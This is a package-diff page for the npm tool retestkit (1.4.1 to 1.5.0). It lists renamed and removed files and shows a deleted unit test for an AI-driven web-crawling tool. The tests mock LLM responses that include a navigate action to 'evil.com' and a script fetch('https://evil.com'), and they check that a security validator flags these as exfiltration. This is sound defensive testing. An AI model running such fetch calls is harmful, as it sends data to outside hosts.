npm - retestkit - Versions diffs - 1.4.1 → 1.5.0 - Mend

retestkit 1.4.1 → 1.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (238) hide show

package/README.md +59 -40
package/dist/config.js +8 -8
package/dist/config.js.map +1 -1
package/dist/logger.js +1 -1
package/dist/logger.js.map +1 -1
package/dist/prompts/index.d.ts +1 -1
package/dist/prompts/index.d.ts.map +1 -1
package/dist/prompts/index.js +21 -21
package/dist/prompts/index.js.map +1 -1
package/dist/prompts/templates/mcp/retest-crawl.md +7 -0
package/{src/prompts/templates/mcp/webtest-discover-flows.md → dist/prompts/templates/mcp/retest-discover-flows.md} +1 -1
package/{src/prompts/templates/mcp/webtest-discover.md → dist/prompts/templates/mcp/retest-discover.md} +2 -2
package/dist/prompts/templates/mcp/retest-full-workflow.md +12 -0
package/{src/prompts/templates/mcp/webtest-generate-tests.md → dist/prompts/templates/mcp/retest-generate-tests.md} +1 -1
package/{src/prompts/templates/mcp/webtest-run-test.md → dist/prompts/templates/mcp/retest-run-test.md} +1 -1
package/{src/prompts/templates/mcp/webtest-start.md → dist/prompts/templates/mcp/retest-start.md} +1 -1
package/{src → dist}/prompts/templates/sampling/system-prefix.md +1 -1
package/dist/resources/index.js +7 -7
package/dist/resources/index.js.map +1 -1
package/dist/schemas/config.js +2 -2
package/dist/schemas/config.js.map +1 -1
package/dist/security/index.js +1 -1
package/dist/security/index.js.map +1 -1
package/dist/server.js +3 -3
package/dist/server.js.map +1 -1
package/dist/test-utils/mock-context.js +22 -22
package/dist/test-utils/mock-context.js.map +1 -1
package/dist/tools/index.d.ts +1 -1
package/dist/tools/index.d.ts.map +1 -1
package/dist/tools/index.js +5 -5
package/dist/tools/index.js.map +1 -1
package/dist/tools/retest/crawl.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/crawl.js +7 -7
package/dist/tools/retest/crawl.js.map +1 -0
package/dist/tools/retest/discover-features.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/discover-features.js +6 -6
package/dist/tools/retest/discover-features.js.map +1 -0
package/dist/tools/retest/discover-flows.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/discover-flows.js +6 -6
package/dist/tools/retest/discover-flows.js.map +1 -0
package/dist/tools/retest/generate-tests.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/generate-tests.js +5 -5
package/dist/tools/retest/generate-tests.js.map +1 -0
package/dist/tools/retest/index.d.ts.map +1 -0
package/dist/tools/retest/index.js.map +1 -0
package/dist/tools/retest/run-test-case.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/run-test-case.js +3 -3
package/dist/tools/retest/run-test-case.js.map +1 -0
package/dist/tools/retest/schemas.d.ts.map +1 -0
package/dist/tools/retest/schemas.js.map +1 -0
package/dist/tools/retest/start-analysis.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/start-analysis.js +5 -5
package/dist/tools/retest/start-analysis.js.map +1 -0
package/dist/workspace/index.js +8 -8
package/dist/workspace/index.js.map +1 -1
package/dist/workspace/types.d.ts +2 -2
package/dist/workspace/types.d.ts.map +1 -1
package/package.json +6 -2
package/.claude/commands/openspec/apply.md +0 -23
package/.claude/commands/openspec/archive.md +0 -27
package/.claude/commands/openspec/proposal.md +0 -28
package/.gemini/commands/openspec/apply.toml +0 -21
package/.gemini/commands/openspec/archive.toml +0 -25
package/.gemini/commands/openspec/proposal.toml +0 -26
package/.github/prompts/openspec-apply.prompt.md +0 -22
package/.github/prompts/openspec-archive.prompt.md +0 -26
package/.github/prompts/openspec-proposal.prompt.md +0 -27
package/.github/workflows/release.yml +0 -33
package/.kilocode/workflows/openspec-apply.md +0 -17
package/.kilocode/workflows/openspec-archive.md +0 -21
package/.kilocode/workflows/openspec-proposal.md +0 -22
package/.mcp.json +0 -23
package/.opencode/command/openspec-apply.md +0 -25
package/.opencode/command/openspec-archive.md +0 -28
package/.opencode/command/openspec-proposal.md +0 -30
package/.roo/commands/openspec-apply.md +0 -20
package/.roo/commands/openspec-archive.md +0 -24
package/.roo/commands/openspec-proposal.md +0 -25
package/.vscode/mcp.json +0 -23
package/AGENTS.md +0 -18
package/CLAUDE.md +0 -18
package/dist/tools/webtest/crawl.d.ts.map +0 -1
package/dist/tools/webtest/crawl.js.map +0 -1
package/dist/tools/webtest/discover-features.d.ts.map +0 -1
package/dist/tools/webtest/discover-features.js.map +0 -1
package/dist/tools/webtest/discover-flows.d.ts.map +0 -1
package/dist/tools/webtest/discover-flows.js.map +0 -1
package/dist/tools/webtest/generate-tests.d.ts.map +0 -1
package/dist/tools/webtest/generate-tests.js.map +0 -1
package/dist/tools/webtest/index.d.ts.map +0 -1
package/dist/tools/webtest/index.js.map +0 -1
package/dist/tools/webtest/run-test-case.d.ts.map +0 -1
package/dist/tools/webtest/run-test-case.js.map +0 -1
package/dist/tools/webtest/schemas.d.ts.map +0 -1
package/dist/tools/webtest/schemas.js.map +0 -1
package/dist/tools/webtest/start-analysis.d.ts.map +0 -1
package/dist/tools/webtest/start-analysis.js.map +0 -1
package/openspec/AGENTS.md +0 -456
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/proposal.md +0 -33
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/specs/webtest-resources/spec.md +0 -27
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/specs/webtest-tools/spec.md +0 -304
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/tasks.md +0 -43
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/design.md +0 -209
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/proposal.md +0 -41
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/specs/mcp-server-core/spec.md +0 -183
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/tasks.md +0 -112
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/design.md +0 -333
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/proposal.md +0 -66
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/mcp-server-core/spec.md +0 -129
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-lifecycle/spec.md +0 -138
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-logging/spec.md +0 -211
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-prompts/spec.md +0 -157
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-resources/spec.md +0 -213
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-sampling/spec.md +0 -257
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-tools/spec.md +0 -501
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/tasks.md +0 -264
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/proposal.md +0 -24
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/specs/webtest-tools/spec.md +0 -80
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/tasks.md +0 -8
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/design.md +0 -90
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/proposal.md +0 -28
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/specs/webtest-sampling/spec.md +0 -90
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/tasks.md +0 -33
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/design.md +0 -558
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/proposal.md +0 -119
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/specs/webtest-resources/spec.md +0 -109
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/specs/webtest-tools/spec.md +0 -121
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/tasks.md +0 -133
package/openspec/changes/extract-prompts-to-markdown/design.md +0 -86
package/openspec/changes/extract-prompts-to-markdown/proposal.md +0 -50
package/openspec/changes/extract-prompts-to-markdown/specs/webtest-prompts/spec.md +0 -74
package/openspec/changes/extract-prompts-to-markdown/tasks.md +0 -40
package/openspec/changes/refactor-webtest-naming/design.md +0 -95
package/openspec/changes/refactor-webtest-naming/proposal.md +0 -66
package/openspec/changes/refactor-webtest-naming/specs/webtest-prompts/spec.md +0 -79
package/openspec/changes/refactor-webtest-naming/specs/webtest-resources/spec.md +0 -80
package/openspec/changes/refactor-webtest-naming/specs/webtest-sampling/spec.md +0 -122
package/openspec/changes/refactor-webtest-naming/specs/webtest-tools/spec.md +0 -113
package/openspec/changes/refactor-webtest-naming/tasks.md +0 -119
package/openspec/changes/rename-package-to-retest/proposal.md +0 -52
package/openspec/changes/rename-package-to-retest/specs/mcp-server-core/spec.md +0 -53
package/openspec/changes/rename-package-to-retest/specs/retest-lifecycle/spec.md +0 -68
package/openspec/changes/rename-package-to-retest/specs/retest-logging/spec.md +0 -35
package/openspec/changes/rename-package-to-retest/specs/retest-prompts/spec.md +0 -159
package/openspec/changes/rename-package-to-retest/specs/retest-resources/spec.md +0 -251
package/openspec/changes/rename-package-to-retest/specs/retest-sampling/spec.md +0 -99
package/openspec/changes/rename-package-to-retest/specs/retest-tools/spec.md +0 -295
package/openspec/changes/rename-package-to-retest/tasks.md +0 -71
package/openspec/project.md +0 -31
package/openspec/specs/mcp-server-core/spec.md +0 -178
package/openspec/specs/webtest-lifecycle/spec.md +0 -136
package/openspec/specs/webtest-logging/spec.md +0 -209
package/openspec/specs/webtest-prompts/spec.md +0 -155
package/openspec/specs/webtest-resources/spec.md +0 -248
package/openspec/specs/webtest-sampling/spec.md +0 -344
package/openspec/specs/webtest-tools/spec.md +0 -282
package/release.config.js +0 -9
package/src/config.test.ts +0 -96
package/src/config.ts +0 -32
package/src/elicitation/index.test.ts +0 -399
package/src/elicitation/index.ts +0 -171
package/src/elicitation/types.ts +0 -68
package/src/index.ts +0 -83
package/src/lifecycle/index.test.ts +0 -260
package/src/lifecycle/index.ts +0 -101
package/src/logger.redaction.test.ts +0 -322
package/src/logger.test.ts +0 -123
package/src/logger.ts +0 -229
package/src/playwright-client/index.ts +0 -392
package/src/playwright-client/types.ts +0 -99
package/src/progress/index.test.ts +0 -327
package/src/progress/index.ts +0 -170
package/src/progress/types.ts +0 -25
package/src/prompts/index.test.ts +0 -451
package/src/prompts/index.ts +0 -246
package/src/prompts/loader.test.ts +0 -100
package/src/prompts/loader.ts +0 -59
package/src/prompts/templates/mcp/webtest-crawl.md +0 -7
package/src/prompts/templates/mcp/webtest-full-workflow.md +0 -12
package/src/resources/index.ts +0 -250
package/src/resources/subscriptions.ts +0 -37
package/src/sampling/index.test.ts +0 -414
package/src/sampling/index.ts +0 -286
package/src/sampling/prompts.ts +0 -194
package/src/sampling/types.ts +0 -60
package/src/schemas/config.ts +0 -39
package/src/security/index.test.ts +0 -441
package/src/security/index.ts +0 -361
package/src/security/security-scenarios.test.ts +0 -468
package/src/server.ts +0 -211
package/src/test-utils/index.ts +0 -6
package/src/test-utils/mock-context.ts +0 -426
package/src/test-utils/mock-playwright-client.ts +0 -422
package/src/tools/index.ts +0 -11
package/src/tools/webtest/crawl.test.ts +0 -834
package/src/tools/webtest/crawl.ts +0 -901
package/src/tools/webtest/discover-features.ts +0 -412
package/src/tools/webtest/discover-flows.ts +0 -408
package/src/tools/webtest/generate-tests.test.ts +0 -532
package/src/tools/webtest/generate-tests.ts +0 -425
package/src/tools/webtest/index.ts +0 -7
package/src/tools/webtest/integration.test.ts +0 -536
package/src/tools/webtest/run-test-case.test.ts +0 -659
package/src/tools/webtest/run-test-case.ts +0 -508
package/src/tools/webtest/schemas.ts +0 -201
package/src/tools/webtest/start-analysis.test.ts +0 -151
package/src/tools/webtest/start-analysis.ts +0 -158
package/src/transports/http.ts +0 -19
package/src/transports/index.ts +0 -30
package/src/transports/stdio.ts +0 -7
package/src/types/capabilities.test.ts +0 -193
package/src/types/capabilities.ts +0 -50
package/src/types/context.ts +0 -21
package/src/types/tool.ts +0 -11
package/src/workspace/index.ts +0 -945
package/src/workspace/markdown.ts +0 -272
package/src/workspace/types.ts +0 -186
package/tests/integration/server.test.ts +0 -89
package/tests/integration/tools.test.ts +0 -99
package/tsconfig.json +0 -20
package/vitest.config.ts +0 -9
package/vitest.integration.config.ts +0 -10
/package/{src → dist}/prompts/templates/sampling/crawl-action.md +0 -0
/package/{src → dist}/prompts/templates/sampling/feature-discovery.md +0 -0
/package/{src → dist}/prompts/templates/sampling/flow-discovery.md +0 -0
/package/{src → dist}/prompts/templates/sampling/page-content-wrapper.md +0 -0
/package/{src → dist}/prompts/templates/sampling/test-evaluation.md +0 -0
/package/{src → dist}/prompts/templates/sampling/test-generation.md +0 -0
/package/dist/tools/{webtest → retest}/crawl.d.ts +0 -0
/package/dist/tools/{webtest → retest}/discover-features.d.ts +0 -0
/package/dist/tools/{webtest → retest}/discover-flows.d.ts +0 -0
/package/dist/tools/{webtest → retest}/generate-tests.d.ts +0 -0
/package/dist/tools/{webtest → retest}/index.d.ts +0 -0
/package/dist/tools/{webtest → retest}/index.js +0 -0
/package/dist/tools/{webtest → retest}/run-test-case.d.ts +0 -0
/package/dist/tools/{webtest → retest}/schemas.d.ts +0 -0
/package/dist/tools/{webtest → retest}/schemas.js +0 -0
/package/dist/tools/{webtest → retest}/start-analysis.d.ts +0 -0

package/src/tools/webtest/crawl.test.ts DELETED Viewed

@@ -1,834 +0,0 @@
-/**
- * Unit Tests for webtest_crawl_app tool (Phase 4.13)
- */
-import { describe, it, expect, vi, beforeEach } from "vitest";
-import { createCrawlTool } from "./crawl.js";
-import {
-  createMockContext,
-  type MockContext,
-} from "../../test-utils/index.js";
-describe("webtest_crawl_app", () => {
-  let context: MockContext;
-  let tool: ReturnType<typeof createCrawlTool>;
-  beforeEach(() => {
-    context = createMockContext();
-    tool = createCrawlTool(() => context as any);
-  });
-  describe("tool metadata", () => {
-    it("has correct name", () => {
-      expect(tool.name).toBe("webtest_crawl_app");
-    });
-    it("has a description", () => {
-      expect(tool.description).toBeDefined();
-      expect(tool.description.length).toBeGreaterThan(0);
-    });
-    it("has an input schema", () => {
-      expect(tool.inputSchema).toBeDefined();
-    });
-  });
-  describe("handler - validation", () => {
-    it("returns error for non-existent workspace", async () => {
-      context.workspaceManager.workspaceExists = vi.fn().mockResolvedValue(false);
-      const result = await tool.handler({
-        analysisId: "00000000-0000-0000-0000-000000000000",
-        goal: "Explore the site",
-      });
-      expect(result.isError).toBe(true);
-      expect(result.content[0].text).toContain("not found");
-    });
-    it("validates analysisId format via schema", () => {
-      // The schema requires UUID format
-      const schema = tool.inputSchema;
-      expect(schema).toBeDefined();
-    });
-    it("requires goal parameter", () => {
-      const schema = tool.inputSchema;
-      expect(schema).toBeDefined();
-    });
-  });
-  describe("handler - crawl execution", () => {
-    beforeEach(async () => {
-      // Set up successful sampling that completes immediately
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Goal achieved",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await context.playwrightClient.connect();
-    });
-    it("creates crawl in workspace", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(result.isError).toBeFalsy();
-      expect(context.workspaceManager.createCrawl).toHaveBeenCalled();
-    });
-    it("connects to playwright if not connected", async () => {
-      context.playwrightClient.isConnected = vi.fn().mockReturnValue(false);
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.playwrightClient.connect).toHaveBeenCalled();
-    });
-    it("navigates to workspace URL", async () => {
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.playwrightClient.navigate).toHaveBeenCalled();
-    });
-    it("captures page snapshot", async () => {
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.playwrightClient.snapshot).toHaveBeenCalled();
-    });
-    it("returns crawlId in response", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(result.isError).toBeFalsy();
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.crawlId).toBeDefined();
-    });
-    it("returns status completed when goal achieved", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(result.isError).toBeFalsy();
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.status).toBe("completed");
-      expect(content.goalComplete).toBe(true);
-    });
-    it("returns next steps after completion", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.nextSteps).toBeInstanceOf(Array);
-      expect(content.nextSteps.length).toBeGreaterThan(0);
-    });
-  });
-  describe("handler - limits", () => {
-    beforeEach(async () => {
-      await context.playwrightClient.connect();
-    });
-    it("uses workspace limits by default", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.workspaceManager.createCrawl).toHaveBeenCalledWith(
-        context.testAnalysisId,
-        expect.objectContaining({
-          limits: expect.objectContaining({
-            maxSteps: expect.any(Number),
-          }),
-        })
-      );
-    });
-    it("respects custom limits", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-        limits: { maxSteps: 5 },
-      });
-      expect(context.workspaceManager.createCrawl).toHaveBeenCalledWith(
-        context.testAnalysisId,
-        expect.objectContaining({
-          limits: expect.objectContaining({
-            maxSteps: 5,
-          }),
-        })
-      );
-    });
-  });
-  describe("handler - fallback mode", () => {
-    beforeEach(async () => {
-      context.samplingClient.hasSampling = vi.fn().mockReturnValue(false);
-      await context.playwrightClient.connect();
-    });
-    it("returns prompt when sampling unavailable", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(result.isError).toBeFalsy();
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.needsManualInput).toBe(true);
-      expect(content.prompt).toBeDefined();
-    });
-    it("includes instructions for manual mode", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.instructions).toContain("manualNextActions");
-    });
-    it("includes partial results info", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.partialResults).toBeDefined();
-    });
-  });
-  describe("handler - manual actions", () => {
-    beforeEach(async () => {
-      context.samplingClient.hasSampling = vi.fn().mockReturnValue(false);
-      await context.playwrightClient.connect();
-    });
-    it("executes manual actions when provided", async () => {
-      // First call triggers the manual flow and executes the action
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-        manualNextActions: [
-          { tool: "click", args: { element: "Submit button", ref: "e1" } },
-        ],
-      });
-      expect(context.playwrightClient.click).toHaveBeenCalledWith("Submit button", "e1");
-    });
-    it("validates manual actions for security", async () => {
-      context.securityValidator.validateAction = vi.fn().mockReturnValue({
-        valid: false,
-        reason: "External domain not allowed",
-      });
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-        manualNextActions: [
-          { tool: "navigate", args: { url: "https://evil.com" } },
-        ],
-      });
-      expect(result.isError).toBe(true);
-      expect(result.content[0].text).toContain("Security error");
-    });
-  });
-  describe("handler - cancellation", () => {
-    it("handles cancellation gracefully", async () => {
-      // Set up to throw cancellation error
-      const { CancellationError } = await import("../../progress/index.js");
-      context.cancellationRegistry.checkCancelled = vi.fn().mockImplementation((id) => {
-        throw new CancellationError(id);
-      });
-      await context.playwrightClient.connect();
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(result.isError).toBeFalsy();
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.status).toBe("cancelled");
-    });
-    it("registers for cancellation on start", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await context.playwrightClient.connect();
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.cancellationRegistry.register).toHaveBeenCalled();
-    });
-    it("unregisters cancellation on completion", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await context.playwrightClient.connect();
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.cancellationRegistry.unregister).toHaveBeenCalled();
-    });
-  });
-  describe("handler - progress reporting", () => {
-    beforeEach(async () => {
-      await context.playwrightClient.connect();
-    });
-    it("emits progress during crawl", async () => {
-      let stepCount = 0;
-      context.samplingClient.createMessage = vi.fn().mockImplementation(async () => {
-        stepCount++;
-        if (stepCount >= 2) {
-          return {
-            success: true,
-            data: {
-              actions: [],
-              reasoning: "Done",
-              goalProgress: "Complete",
-              goalComplete: true,
-            },
-          };
-        }
-        return {
-          success: true,
-          data: {
-            actions: [{ tool: "click", args: { selector: "a" } }],
-            reasoning: "Exploring",
-            goalProgress: `Step ${stepCount}`,
-            goalComplete: false,
-          },
-        };
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.progressEmitter.emit).toHaveBeenCalled();
-    });
-  });
-  describe("handler - checkpoint and resume", () => {
-    beforeEach(async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await context.playwrightClient.connect();
-    });
-    it("supports resume flag", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-        resume: true,
-      });
-      expect(result.isError).toBeFalsy();
-      expect(context.workspaceManager.loadCheckpoint).toHaveBeenCalled();
-    });
-    it("continues from checkpoint when available", async () => {
-      context.workspaceManager.loadCheckpoint = vi.fn().mockResolvedValue({
-        step: 5,
-        timestamp: new Date().toISOString(),
-        visitedUrls: ["https://shop.example.com", "https://shop.example.com/products"],
-        currentUrl: "https://shop.example.com/products",
-        goalProgress: "Found products",
-        canResume: true,
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Continue exploring",
-        resume: true,
-      });
-      // Should navigate to checkpoint URL
-      expect(context.playwrightClient.navigate).toHaveBeenCalled();
-    });
-    it("starts fresh when no checkpoint available", async () => {
-      context.workspaceManager.loadCheckpoint = vi.fn().mockResolvedValue(null);
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-        resume: true,
-      });
-      // Should still work
-      expect(context.playwrightClient.navigate).toHaveBeenCalled();
-    });
-  });
-  describe("handler - security validation", () => {
-    beforeEach(async () => {
-      await context.playwrightClient.connect();
-    });
-    it("validates actions against allowed domains", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "navigate", args: { url: "https://evil.com" } }],
-          reasoning: "Navigating",
-          goalProgress: "Exploring",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      context.securityValidator.validateAction = vi.fn().mockReturnValue({
-        valid: false,
-        reason: "External domain not allowed",
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.securityValidator.validateAction).toHaveBeenCalled();
-    });
-    it("detects exfiltration attempts", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "evaluate", args: { script: "fetch('https://evil.com')" } }],
-          reasoning: "Running script",
-          goalProgress: "Testing",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      context.securityValidator.detectExfiltrationAttempt = vi.fn().mockReturnValue({
-        detected: true,
-        type: "external_request",
-        evidence: "POST to external",
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.securityValidator.detectExfiltrationAttempt).toHaveBeenCalled();
-    });
-    it("checks for injection in page content", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.securityValidator.detectInjectionAttempt).toHaveBeenCalled();
-    });
-  });
-  describe("handler - action execution", () => {
-    beforeEach(async () => {
-      await context.playwrightClient.connect();
-    });
-    it("executes click actions", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "click", args: { element: "Submit button", ref: "e1" } }],
-          reasoning: "Clicking button",
-          goalProgress: "Clicking",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.playwrightClient.click).toHaveBeenCalledWith("Submit button", "e1");
-    });
-    it("executes type actions", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "type", args: { element: "Input field", ref: "e2", text: "hello" } }],
-          reasoning: "Typing",
-          goalProgress: "Typing",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.playwrightClient.type).toHaveBeenCalledWith("Input field", "e2", "hello", { submit: undefined, slowly: undefined });
-    });
-    it("executes navigate actions", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "navigate", args: { url: "https://shop.example.com/products" } }],
-          reasoning: "Navigating",
-          goalProgress: "Navigating",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.playwrightClient.navigate).toHaveBeenCalledWith("https://shop.example.com/products");
-    });
-    it("records actions in workspace", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "click", args: { selector: "a" } }],
-          reasoning: "Clicking link",
-          goalProgress: "Exploring",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.workspaceManager.recordAction).toHaveBeenCalled();
-    });
-  });
-  describe("handler - blocked state", () => {
-    beforeEach(async () => {
-      await context.playwrightClient.connect();
-    });
-    it("handles blocked response from sampling", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Cannot proceed",
-          goalProgress: "Blocked",
-          goalComplete: false,
-          blocked: true,
-          blockedReason: "Login required",
-        },
-      });
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(result.isError).toBeFalsy();
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.blocked).toBe(true);
-      expect(content.blockedReason).toBe("Login required");
-    });
-    it("handles sampling failure", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: false,
-        error: "LLM error",
-      });
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(result.isError).toBeFalsy();
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.blocked).toBe(true);
-    });
-  });
-  describe("handler - resource notifications", () => {
-    beforeEach(async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await context.playwrightClient.connect();
-    });
-    it("notifies on crawl creation", async () => {
-      vi.clearAllMocks();
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.resourceManager.notifyListChanged).toHaveBeenCalled();
-    });
